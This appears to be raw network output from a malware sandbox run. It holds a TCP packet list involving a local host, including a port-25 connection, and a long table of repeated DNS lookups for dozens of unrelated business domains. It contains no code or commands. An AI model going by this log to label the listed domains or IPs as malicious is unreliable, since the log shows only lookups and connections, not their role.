                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.620682955 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.620703936 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.620740891 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.620757103 CEST5011380192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.620759964 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.620779037 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.620798111 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.620815992 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.620821953 CEST5011380192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.620842934 CEST5011380192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.620868921 CEST5011380192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.625401020 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.625658035 CEST5011380192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.627312899 CEST4982580192.168.2.313.248.169.48
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.629957914 CEST804982896.127.180.42192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.646744967 CEST804982513.248.169.48192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.646864891 CEST4982580192.168.2.313.248.169.48
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745522022 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745553970 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745573044 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745592117 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745611906 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745632887 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745651960 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745671034 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745691061 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745709896 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745728970 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745748043 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745768070 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745768070 CEST5011380192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745785952 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745814085 CEST5011380192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745841980 CEST5011380192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745898962 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.745980978 CEST5011380192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.755132914 CEST2550105142.250.153.27192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.789167881 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.789202929 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.789222956 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.789242029 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.789259911 CEST8050113104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.805262089 CEST5011380192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.805318117 CEST5011380192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.805318117 CEST5011380192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.805385113 CEST5010525192.168.2.3142.250.153.27
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.823302984 CEST805007962.122.190.121192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.823369980 CEST5007980192.168.2.362.122.190.121
                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.256109953 CEST192.168.2.38.8.8.80x63fdStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.257860899 CEST192.168.2.38.8.8.80xf966Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.257917881 CEST192.168.2.38.8.8.80xca6fStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.260669947 CEST192.168.2.38.8.8.80x4c08Standard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.262264967 CEST192.168.2.38.8.8.80x6e91Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.264027119 CEST192.168.2.38.8.8.80xb590Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.265932083 CEST192.168.2.38.8.8.80xa3e3Standard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.267618895 CEST192.168.2.38.8.8.80xa2cfStandard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.268323898 CEST192.168.2.38.8.8.80xe241Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.269104958 CEST192.168.2.38.8.8.80x52f1Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.558448076 CEST192.168.2.38.8.8.80xfd52Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.561817884 CEST192.168.2.38.8.8.80x2633Standard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.717698097 CEST192.168.2.38.8.8.80x46baStandard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.744847059 CEST192.168.2.38.8.8.80x9e9eStandard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.746406078 CEST192.168.2.38.8.8.80x25bStandard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.892098904 CEST192.168.2.38.8.8.80xf2aStandard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.942424059 CEST192.168.2.38.8.8.80x1d60Standard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.943152905 CEST192.168.2.38.8.8.80x669bStandard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.965665102 CEST192.168.2.38.8.8.80x6318Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.317934036 CEST192.168.2.38.8.8.80xef83Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.360562086 CEST192.168.2.38.8.8.80x5bd2Standard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.363286018 CEST192.168.2.38.8.8.80xdb8dStandard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.366487980 CEST192.168.2.38.8.8.80x3060Standard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.901515007 CEST192.168.2.38.8.8.80xfbafStandard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.901585102 CEST192.168.2.38.8.8.80x906eStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.909764051 CEST192.168.2.38.8.8.80x70ecStandard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.912344933 CEST192.168.2.38.8.8.80x76daStandard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.915785074 CEST192.168.2.38.8.8.80x44d3Standard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.919688940 CEST192.168.2.38.8.8.80x6c18Standard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.994981050 CEST192.168.2.38.8.8.80xa76Standard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.603882074 CEST192.168.2.38.8.8.80x3235Standard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.769675970 CEST192.168.2.38.8.8.80x6b45Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.791235924 CEST192.168.2.38.8.8.80xdaa5Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.794809103 CEST192.168.2.38.8.8.80x2d13Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.797121048 CEST192.168.2.38.8.8.80xe2ddStandard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.820192099 CEST192.168.2.38.8.8.80xc257Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.828025103 CEST192.168.2.38.8.8.80x5189Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.996745110 CEST192.168.2.38.8.8.80x67daStandard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.326133966 CEST192.168.2.38.8.8.80x7631Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.328849077 CEST192.168.2.38.8.8.80x7015Standard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.334434986 CEST192.168.2.38.8.8.80xfe54Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.966479063 CEST192.168.2.38.8.8.80xa5cbStandard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.973440886 CEST192.168.2.38.8.8.80xb53cStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.973440886 CEST192.168.2.38.8.8.80xcae9Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.975565910 CEST192.168.2.38.8.8.80xee4Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.978334904 CEST192.168.2.38.8.8.80x3ebcStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.027132034 CEST192.168.2.38.8.8.80x9da5Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.030071020 CEST192.168.2.38.8.8.80xbStandard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.243660927 CEST192.168.2.38.8.8.80x4635Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.246737957 CEST192.168.2.38.8.8.80x3d44Standard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.406837940 CEST192.168.2.38.8.8.80xdfc8Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.423785925 CEST192.168.2.38.8.8.80xaa14Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.688081026 CEST192.168.2.38.8.8.80xce06Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.689224958 CEST192.168.2.38.8.8.80x1c56Standard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.689981937 CEST192.168.2.38.8.8.80x107aStandard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.706413984 CEST192.168.2.38.8.8.80x6082Standard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.901058912 CEST192.168.2.38.8.8.80x739dStandard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.970536947 CEST192.168.2.38.8.8.80xb53cStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.970604897 CEST192.168.2.38.8.8.80x3ebcStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.573069096 CEST192.168.2.38.8.8.80x3703Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.575407028 CEST192.168.2.38.8.8.80x4c93Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.580988884 CEST192.168.2.38.8.8.80xeb88Standard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.587219954 CEST192.168.2.38.8.8.80x871dStandard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.922362089 CEST192.168.2.38.8.8.80xb560Standard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:02.475569963 CEST192.168.2.38.8.8.80x3ebcStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:02.701703072 CEST192.168.2.38.8.8.80x324cStandard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:02.708142996 CEST192.168.2.38.8.8.80x5999Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:03.074557066 CEST192.168.2.38.8.8.80xc347Standard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:03.081124067 CEST192.168.2.38.8.8.80xc6aeStandard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.187062025 CEST192.168.2.38.8.8.80xf906Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.379776001 CEST192.168.2.38.8.8.80x1bf3Standard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.527412891 CEST192.168.2.38.8.8.80x336fStandard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.547106028 CEST192.168.2.38.8.8.80x9da6Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.846693993 CEST192.168.2.38.8.8.80xd2b2Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.864423037 CEST192.168.2.38.8.8.80xedd8Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.869918108 CEST192.168.2.38.8.8.80x271dStandard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:05.106482029 CEST192.168.2.38.8.8.80xc725Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:06.049530983 CEST192.168.2.38.8.8.80x2fd1Standard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:06.474149942 CEST192.168.2.38.8.8.80xe522Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.438752890 CEST192.168.2.38.8.8.80xff9dStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.460675001 CEST192.168.2.38.8.8.80x5552Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.460779905 CEST192.168.2.38.8.8.80x5180Standard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.464195013 CEST192.168.2.38.8.8.80xcef2Standard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.467964888 CEST192.168.2.38.8.8.80x364Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.475857973 CEST192.168.2.38.8.8.80x1291Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.476753950 CEST192.168.2.38.8.8.80xf730Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.479911089 CEST192.168.2.38.8.8.80xef2dStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.492924929 CEST192.168.2.38.8.8.80x7183Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.522778034 CEST192.168.2.38.8.8.80x1812Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.545826912 CEST192.168.2.38.8.8.80xfdaeStandard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.699098110 CEST192.168.2.38.8.8.80x68e7Standard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.703912020 CEST192.168.2.38.8.8.80xdb94Standard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.864697933 CEST192.168.2.38.8.8.80x171bStandard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.114376068 CEST192.168.2.38.8.8.80x78a8Standard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.167994022 CEST192.168.2.38.8.8.80x937bStandard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.216296911 CEST192.168.2.38.8.8.80x217dStandard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.223176003 CEST192.168.2.38.8.8.80x8bc5Standard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.335237980 CEST192.168.2.38.8.8.80xba45Standard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.341536045 CEST192.168.2.38.8.8.80x22d3Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.004832029 CEST192.168.2.38.8.8.80x873bStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.007639885 CEST192.168.2.38.8.8.80xf3d8Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.007910967 CEST192.168.2.38.8.8.80x2784Standard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.009192944 CEST192.168.2.38.8.8.80x408Standard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.138710022 CEST192.168.2.38.8.8.80x3e27Standard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.139887094 CEST192.168.2.38.8.8.80x405bStandard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.140677929 CEST192.168.2.38.8.8.80xdfdStandard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.161936045 CEST192.168.2.38.8.8.80xefb1Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.251163006 CEST192.168.2.38.8.8.80x3c32Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.253061056 CEST192.168.2.38.8.8.80x230cStandard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.719896078 CEST192.168.2.38.8.8.80x4cfbStandard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.823565960 CEST192.168.2.38.8.8.80x51ddStandard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.824589014 CEST192.168.2.38.8.8.80x2ccfStandard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.825579882 CEST192.168.2.38.8.8.80x4da9Standard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.825999022 CEST192.168.2.38.8.8.80x804fStandard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.827646971 CEST192.168.2.38.8.8.80x2646Standard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.827697039 CEST192.168.2.38.8.8.80xa4ecStandard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.845621109 CEST192.168.2.38.8.8.80x958aStandard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.427306890 CEST192.168.2.38.8.8.80xf908Standard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.429317951 CEST192.168.2.38.8.8.80x84e8Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.432158947 CEST192.168.2.38.8.8.80xfcd0Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.449969053 CEST192.168.2.38.8.8.80xd2c1Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.452658892 CEST192.168.2.38.8.8.80x9236Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.459357023 CEST192.168.2.38.8.8.80x6e74Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.534542084 CEST192.168.2.38.8.8.80x9e73Standard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.851506948 CEST192.168.2.38.8.8.80x6094Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.925395966 CEST192.168.2.38.8.8.80x7df9Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.953221083 CEST192.168.2.38.8.8.80xfbb5Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.958086014 CEST192.168.2.38.8.8.80xebf6Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.196080923 CEST192.168.2.38.8.8.80x4baeStandard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.475758076 CEST192.168.2.38.8.8.80xe456Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.477794886 CEST192.168.2.38.8.8.80xf886Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.477971077 CEST192.168.2.38.8.8.80xe41cStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.478749990 CEST192.168.2.38.8.8.80x3206Standard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.479195118 CEST192.168.2.38.8.8.80x6323Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.484997988 CEST192.168.2.38.8.8.80x68bcStandard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.547878981 CEST192.168.2.38.8.8.80xf62fStandard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.651038885 CEST192.168.2.38.8.8.80x52eStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.832488060 CEST192.168.2.38.8.8.80x64edStandard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.904050112 CEST192.168.2.38.8.8.80xb91eStandard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.904050112 CEST192.168.2.38.8.8.80xbd81Standard query (0)www.fink.comA (IP address)IN (0x0001)false
